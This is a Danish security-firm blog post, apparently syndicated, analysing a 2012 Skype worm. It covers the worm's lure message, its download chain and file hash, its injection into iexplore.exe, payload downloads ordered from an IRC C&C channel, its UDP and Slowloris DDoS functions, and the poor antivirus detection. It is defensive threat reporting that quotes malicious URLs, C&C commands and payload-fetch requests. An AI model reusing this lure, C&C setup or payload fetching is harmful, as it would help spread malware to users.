Quantcast
Channel: CSIS Security Group
Viewing all articles
Browse latest Browse all 247

CSIS Nyheder: Giftig Skype "Orm"

$
0
0

En "orm" spreder sig for øjeblikket via Skype. Den har inkluderet et dansk sprog modul der gør den i stand til at tale "dansk".

Den spreder sig med følgende ordlyd (mellemrum indlagt af CSIS):

”ggggg du ser vanvittigt på dette billede http://g oo.gl/AVzL8?img=[%skype navn%]”

Hvis en Skype bruger vælger at klikke på det medfølgende link hentes den skadelige komponent via "sendspace". Bemærk, at der anvendes mange forskellige URLs til formålet. Trafikmønster findes herunder:

http://go o.gl/AVzL8
--> http://www.send space.com/pro/dl/m02hjf
--> "foto 18.11.2012 profile.zip" -->
foto 18.11.2012 profile.exe (MD5: b93a552918f5c1d4dda49bd58db3dd49)


Vi kan se at denne kode allerede har opnået en pæn udbredelse i Europa med flere end 2000 kliks alene fra Danmark.




Hvis den pågældende zip fil udpakkes og køres vil denne malware kopiere sig til harddisken:

C:Users[%brugerkonto%]AppDataRoamingHgasaz.exe
C:Users[%brugerkonto%]AppDataRoaming4BC7.exe

Den pågældende sti er statisk og bestemmes via "SHGetSpecialFolderPathW".

Når vi kigger på hovedkomponenten står det hurtigt klar at denne malware er yderst frisk: [Mon Nov 19 04:07:37 2012 UTC]. Den injekter sig ved kørsel i iexplore.exe processen:

004068C6    push 00411728h    UTF-16 "Internet Exploreriexplore.exe" xref: 004068C3
004068CB    push 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068D0    call dword ptr [00411240h]    PathAppendW@SHLWAPI.DLL (Import)
004068D6    mov eax, 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068DB    ret     function end 

Der downloades supplerende malware via en HTTP GET som defineres igennem en IRC kanal:

GET /dl/179970419/a8fcb14/0028492385y34857.html HTTP/1.1
User-Agent: Mozilla/4.0
Host: hotfile.com

GET /get/3a3d254720f0d0c9ecbf8cf42a98c15eb4f31bfc/50a9f9f4/2/2a5febb05141e137/aba2173/0028492385y34857 HTTP/1.1
User-Agent: Mozilla/4.0
Host: s149.hotfile.com
Connection: Keep-Alive
Cookie: ip=77.87

HTTP/1.1 200 OK
Server: Hotfile Server v0.2
Date: Mon, 19 Nov 2012 09:20:54 GMT
Content-Type: application/octet-stream
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 55296
Content-Disposition: attachment; filename="0028492385y34857"
Content-Transfer-Encoding: binary
Connection: close

Som tidligere nævnt anvender denne malware en IRC server til C&C funktioner (den aktuelle findes på "photobeat.su", men vi har blokeret flere i CSIS Secure DNS):

!j -c BE,DK,FI,FR,GR,HR,HU,IE,NO,PL,RO,SK #gi
Channel: #gi
* Topic for #gi is: !dl http://hotfile.com/dl/[unikt id]

En af funktionerne i denne kode er at kunne igangsætte DDoS angreb mod definerede mål.

push 00415E8Ch    ASCII "[UDP]: Starting flood on "%s:%d" for %d second(s)"

push 00415EC0h    ASCII "[UDP]: Finished flood on "%s:%d"

Det pågældende modul til DDoS ser ud til at være baseret på "Slowloris":

{sl0wl0riS}- Started fl00ding! "%s" FOR %d MinUt3{s}, va: 00415E30
[Slowloris]: Finished flood on "%s", va: 00415E68

Denne "orm" indeholder endvidere en selvbeskyttende funktion som genoptager processen såfremt den dræbes "%s.Protect "%s" against file removal done!!"

Antivirus detektion er ikke eksisterende:

Agnitum     -     20121116
AntiVir     -     20121116
Antiy-AVL     -     20121116
Avast     -     20121116
AVG     -     20121115
BitDefender     -     20121116
CAT-QuickHeal     -     20121116
ClamAV     -     20121115
Commtouch     -     20121116
Comodo     -     20121116
DrWeb     -     20121116
Emsisoft     -     20121116
eSafe     -     20121115
ESET-NOD32     -     20121116
F-Prot     -     20121116
F-Secure     -     20121116
Fortinet     -     20121116
GData     -     20121116
Ikarus     -     20121116
Jiangmin     -     20121116
K7AntiVirus     -     20121115
Kaspersky     -     20121116
Kingsoft     -     20121112
McAfee     -     20121116
McAfee-GW-Edition     -     20121116
Microsoft     -     20121116
MicroWorld-eScan     -     20121116
Norman     -     20121116
nProtect     -     20121116
Panda     -     20121116
PCTools     -     20121116
Rising     -     20121116
Sophos     -     20121116
SUPERAntiSpyware     -     20121116
Symantec     WS.Reputation.1     20121116
TheHacker     -     20121113
TotalDefense     -     20121115
TrendMicro     -     20121116
TrendMicro-HouseCall     -     20121116
VBA32     -     20121115
VIPRE     -     20121116
ViRobot     -     20121116


Viewing all articles
Browse latest Browse all 247

Trending Articles


Grand galla med gull og glitter


Psykiater Tonny Westergaard


Jav Uncensored - Tokyo-Hot n1002 Miyu Kitagawa


Moriya Suwako (Touhou)


BRODERET KLOKKESTRENG MED ORDSPROG 14 X 135 CM.


Naruto Shippuden Episode 471 Subtitle Indonesia


Fin gl. teske i sølv - 2 tårnet - stemplet


Kaffefilterholder fra Knabstrup


Anders Agger i Herstedvester


Onkel Joakims Lykkemønt *3 stk* *** Perfekt Stand ***


Sælges: Coral Beta/Flat (Højttaler-enheder)


Starwars landspeeder 7110


NMB48 – Durian Shounen (Dance Version) [2015.07.15]


Le bonheur | question de l'autre


Scope.dk som agent?


Akemi Homura & Kaname Madoka (Puella Magi Madoka Magica)


Tidemands taffel-marmelade julen1934+julen 1937+julen 1938.


Re: KZUBR MIG/MMA 300 zamena tranzistora


Analyse 0 mundtlig eksamen


DIY - Hæklet bil og flyvemaskine